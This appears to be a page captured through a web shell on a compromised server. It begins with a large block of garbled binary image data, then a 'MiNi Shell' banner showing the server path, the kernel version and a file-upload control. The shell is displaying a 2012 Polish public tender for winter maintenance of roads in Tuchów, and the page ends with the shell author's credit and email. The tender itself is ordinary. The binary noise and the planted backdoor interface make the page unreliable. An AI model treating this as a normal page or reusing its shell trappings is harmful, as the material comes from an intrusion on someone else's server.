JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121018/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121018/404720-N-2012.html

<p class="kh_header"><b>Tuchów: Przedmiotem wykonania jest zimowe utrzymanie ulic i dróg na terenie gminy Tuchów w okresie zimowym 2012/2013.</b><br>
<b>Numer ogłoszenia: 404720 - 2012; data zamieszczenia: 18.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem wykonania jest zimowe utrzymanie ulic i dróg na terenie gminy Tuchów w okresie zimowym 2012/2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem wykonania jest zimowe utrzymanie ulic i dróg na terenie gminy Tuchów w okresie zimowym 2012/2013.
		
Szczegółowy  zakres  robót  określają  załączniki Nr 2,3,4, które  to  dokumenty  są   załącznikiem  do  specyfikacji  istotnych  warunków  zamówienia.
Ulice I kat. odśnieżania
									

Standard: jezdnia odśnieżana na całej szerokości,  jezdnia  posypana na skrzyżowaniach dróg  i odcinkach o   pochyleniu                 > 4 % utrzymana stała przejezdność ulicy ( przyjmując   średnio 4 m. szerokości ulicy i 50 % do posypania)
Każdorazowy wyjazd na rejon musi być uzgodniony z pracownikiem Urzędu odpowiedzialnym za utrzymanie dróg.

Łączna długość I kat 11 680 mb  - 11,68 km + 14,6 km = 26,28 km

Rynek				 	   400 mb -0,40 km
Kolejowa              		          		1600 mb - 1,60 km
Reymonta        				  270 mb - 0,27 km
Jana Pawła II 		  		   300 mb - 0,30km
Kościuszki 			  	    80 mb - 0,08 km
Plac Kościuszki 			 	 	    70 mb - 0,07 km
Szkolna 		           				  130 mb - 0,13 km
Zielona 						 500  mb - 0,50 km
Wołowa 			         	                             2 300 mb - 2,30 km
Grochmala 		            			  120 mb - 0,12 km
Polna 			            	  		    95 mb - 0,95 km
Długa 				         	              2 000 mb - 2,00 km
Wróblewskiego 		        	              2 000 mb - 2,00 km
Żeromskiego 					  180 mb - 0,18 km
Chopina 					  150 mb - 0,15 km
Ogrodowa 					  150 mb - 0,15 km
Szpitalna 			 		  150 mb - 0,15 km
Oś.Centrum do kotłowni 				  180 mb - 0,18 km
Oś.Centrum do bloków	            			  100 mb - 0,10 km
Wspólna                                              		    50 mb - 0,05 km
Buchcice  /do p. Bienia/                  		              4 150 mb - 4,15 km
Piotrkowice -Łowczów              		              5 100 mb - 5,10 km
Lubaszowa   		                  	                 700 mb - 0,70 km
Wołowa pod szkołę         		             	              1 650 mb - 1,65 km
Piotrkowice                     		                             3 000 mb - 3,00 km
                             
Ulice odśnieżone i posypane po ustaniu opadów nie później niż do godz 6.00, a w ciągu dnia w miarę potrzeb.

Materiał zabezpiecza wykonawca.
Ulice II kat. odśnieżania

Standard: jezdnia odśnieżana na całej szerokości, jezdnia posypana na skrzyżowaniach dróg  co stanowi 30 % danej   ulicy                    i odcinkach o pochyleniu > 4 % utrzymana stała   przejezdność ulicy ( przyjmując średnio 4 m. szerokości ulicy)
Każdorazowy wyjazd na rejon musi być uzgodniony z pracownikiem Urzędu  odpowiedzialnym za utrzymanie dróg.

Łączna długość ulic II kat 16 660 mb - 16,66 km

Łączna dł. 30 % ulic II kat. 4  998 mb -  5,00 km

Wysoka       					600 mb - 0,60 km
Kopernika    					400 mb - 0,40 km
Konopnickiej 					650 mb - 0,65 km
Dierżona					500 mb - 0,50 km
Kazimierza Wil.   				400 mb - 0,40 km
Widok           					300 mb - 0,30 km
Sikorskiego  					150 mb - 0,15 km
650-Lecia   					250 mb - 0,25 km
Bp. Wałegi 		          		             1000 mb - 1,00 km
Św. Józefa  				850 mb - 0,85 km
Warzywna  + łącznik			              600 mb - 0,60  km
Piotrowskiego   				150 mb - 0,15 km
Kąpielowa      					200 mb - 0,20 km
Podwale						300 mb - 0,30 km
Krótka						100 mb - 0,10 km
Graniczna		         		            1 200 mb - 1,20 km
Górna + przewiązka	          		            2 500 mb - 2,55 km
Młyńca					              450 mb -  0,45 km
Drelicharza				              250 mb -  0,25 km
Stawarza				               350 mb - 0,35 km
Szafera						150 mb - 0,15 km
Okólna						900 mb - 0,90 km
Słoneczna + osiedle			              700 mb -  0,70 km
Wyszyńskiego                        			200 mb - 0,20 km
Długa/boczne/                        		              500  mb - 0,50 km
Nowa                                      			360 mb - 0,36 km
Brzozówki                            		            1 600 mb - 1,60 km
Boczna od ul. Leśnej /do p. Starzyk/                            100 mb - 0,10 km
Paderewskiego                        			300 mb - 0,30 km
Promienna I			  	              200  mb - 0,20 km
Promienna II                       	   			200 mb - 0,20  km
Nadziei                                                                             250 mb - 0,25 km


Materiał zabezpiecza wykonawca

Po ustaniu opadów ulice odśnieżone i posypane nie później niż po upływie 5 godzin.
Materiał zabezpiecza wykonawca.
Ulice III kat. odśnieżania

Standard: Utrzymana przejezdność drogi, posypane skrzyżowania z drogami  wyższego rzędu i odcinkami jezdni ze stromymi podjazdami, oraz  odcinkami o pochyleniu > 4% co stanowi 30 % danej ulicy,  średnia szerokość ulic 4 m

Każdorazowy wyjazd na rejon musi być uzgodniony z pracownikiem Urzędu  odpowiedzialnym za utrzymanie dróg.

Łączna dł. III kat 9 600 mb - 9,6 km

Łączna dł. 30 % ulic III kat. 2 880 mb - 2,88 km

Łowiecka                                                        	            1 150 mb - 1,15 km
Ziołowa                                                              	450 mb - 0,45 km
Przedmieście Górne		   		 800 mb -  0,8 km
Strzelecka				            2 350 mb - 2,35 km
Działkowiczów			                	 50  mb - 0,25 km
Szafera                                             	                	900 mb - 0,90 km
Strzeleceka/Patyk/                                         	            1 500 mb - 1,50 km
Stroma			     	                  	  50 mb - 0,05 km
Leśna boczna 			               450 mb - 0,45 km
Polna boczna			               200 mb - 0,20 km
Okólna 			                 	600 mb - 0,60 km
Brzozówki                                        	                 	300 mb - 0,30 km
Jasna                                                                 	300 mb - 0,30 km
Wołowa /do p. Sandeckiego/                                          300 mb - 0,30 km


Materiał zabezpiecza wykonawca

Ulice odśnieżone i posypane w ciągu 24 godzin od ustania opadów

Materiał zabezpiecza wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje uprawnienia do występowania                  w obrocie prawnym. Działalność  prowadzona  na  potrzeby  wykonania  przedmiotu  zamówienia  nie  wymaga  posiadania  specjalnych  uprawnień.

Ocena  tego warunku będzie dokonana  na  podstawie:

 aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania składania ofert,  a  w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga doświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w  zakresie   dysponowania  odpowiednim  potencjałem  technicznym   do  wykonania  zamówienia - Zamawiający  wymaga, aby  wykonawca  dysponował  odpowiednim  potencjałem  technicznym  do  wykonania  niniejszego  zamówienia. 

Ocena  tego warunku będzie dokonana  na  podstawie:
 wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami; 
Wymaga  się aby  Wykonawca  ubiegający  się  o  zamówienie  publiczne  dysponował lub posiadał następujący rodzaj sprzętu:
samochód  pługopiaskarka - 1 szt.
ciągnik  z  pługiem  przystosowanym  do  posypywania  nawierzchni  drogowych - 1 szt
dodatkowy sprzęt ciężki np. spychacz lub koparko ładowarka

W  przypadku  nie  posiadania  własnego  potencjału  technicznego  wskazanego  w  załączniku  nr  7  należy  przedstawić  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego do  wykonania  niniejszego  zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w  zakresie   dysponowania   osobami  zdolnymi   do  wykonania  zamówienia - Zamawiający  wymaga,                               aby  wykonawca  posiadał  lub  dysponował  odpowiednią  ilością  osób  /pracowników  fizycznych/ zdolnych do  wykonania zamówienia  w  ilości  nie mniejszej  niż  5

Ocena tego warunku będzie dokonana w oparciu o:

 oświadczenie  wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

 wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i  wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją                         o podstawie do dysponowania tymi osobami - załącznik  nr  5  SIWZ,

Wykonawca  może  polegać  na  osobach  zdolnych  do  wykonania  zamówienia  innych  podmiotów, niezależnie                           od  charakteru  prawnego  łączących  go  z  nimi  stosunków, udowadniając  iż  będzie  dysponował  osobami  zdolnymi                  do  wykonania  zamówienia, w  szczególności  przedstawiając  pisemne  zobowiązanie  tych  podmiotów  do  oddania                    do  dyspozycji  niezbędnych  osób  na  okres  korzystania  z  nich  przy  wykonaniu  zamówienia.

W  przypadku  nie dysponowania  osobami  zdolnymi  do  wykonania  zamówienia i  nie  posiadania  potencjału  technicznego  należy  przedstawić  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia. 

Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie  wymaganej  sytuacji  ekonomicznej  i  finansowej  - Zamawiający  wymaga, aby  wykonawca  był  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  na  kwotę nie mniejszą                                    niż  200 000  PLN oraz  że  znajduje  się  w  dobrej  sytuacji  finansowej  i  ekonomicznej. 

Ocena tego warunku zostanie dokonana  na  podstawie:

opłaconej polisy, a w przypadku  jej  braku  innego  dokumentu  potwierdzającego, że  wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  związanej  z  przedmiotem  zamówienia
oświadczenia, że wykonawca znajduje się w dobrej kondycji finansowej i ekonomicznej, złożonego w dokumencie                    o nazwie oświadczenie - załącznik nr 1  SIWZ

Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)Projekt  umowy stanowi załącznik do Specyfikacji  Istotnych  Warunków Zamówienia.  W jej treści, która nie podlega negocjacjom podano wszelkie istotne dla zamawiającego warunki realizacji zamówienia.
2)Zamawiający  przewiduje  możliwość  wprowadzenia  zmian  do  zawartej  umowy  w  stosunku  do  treści  oferty                    w następujących  okolicznościach:
3)Konieczności  wykonania  dodatkowych usług  w  przypadku:
a) wystąpienia  w  trakcie  realizacji  niniejszej  umowy  konieczności  wykonania  usług  dodatkowych
b) działaniem  zdarzeń  losowych
4)Zmniejszenia  zakresu  umownego  usług  z  przyczyn    niemożliwych  wcześniej do  przewidzenia  przez  Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tuchow.BIPTuchow/Zamowieniapubliczne +ogloszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie , 33-170 Tuchów , ul. RYnek 1 , pokój nr 5. Materiały przetargowe są bezpłatne..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2012 godzina 10:00, miejsce: Urząd Miejski w Tuchowie , 33-170 Tuchów , ul. Rynek 1 , pokój nr 7. Dzienniik podawczy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com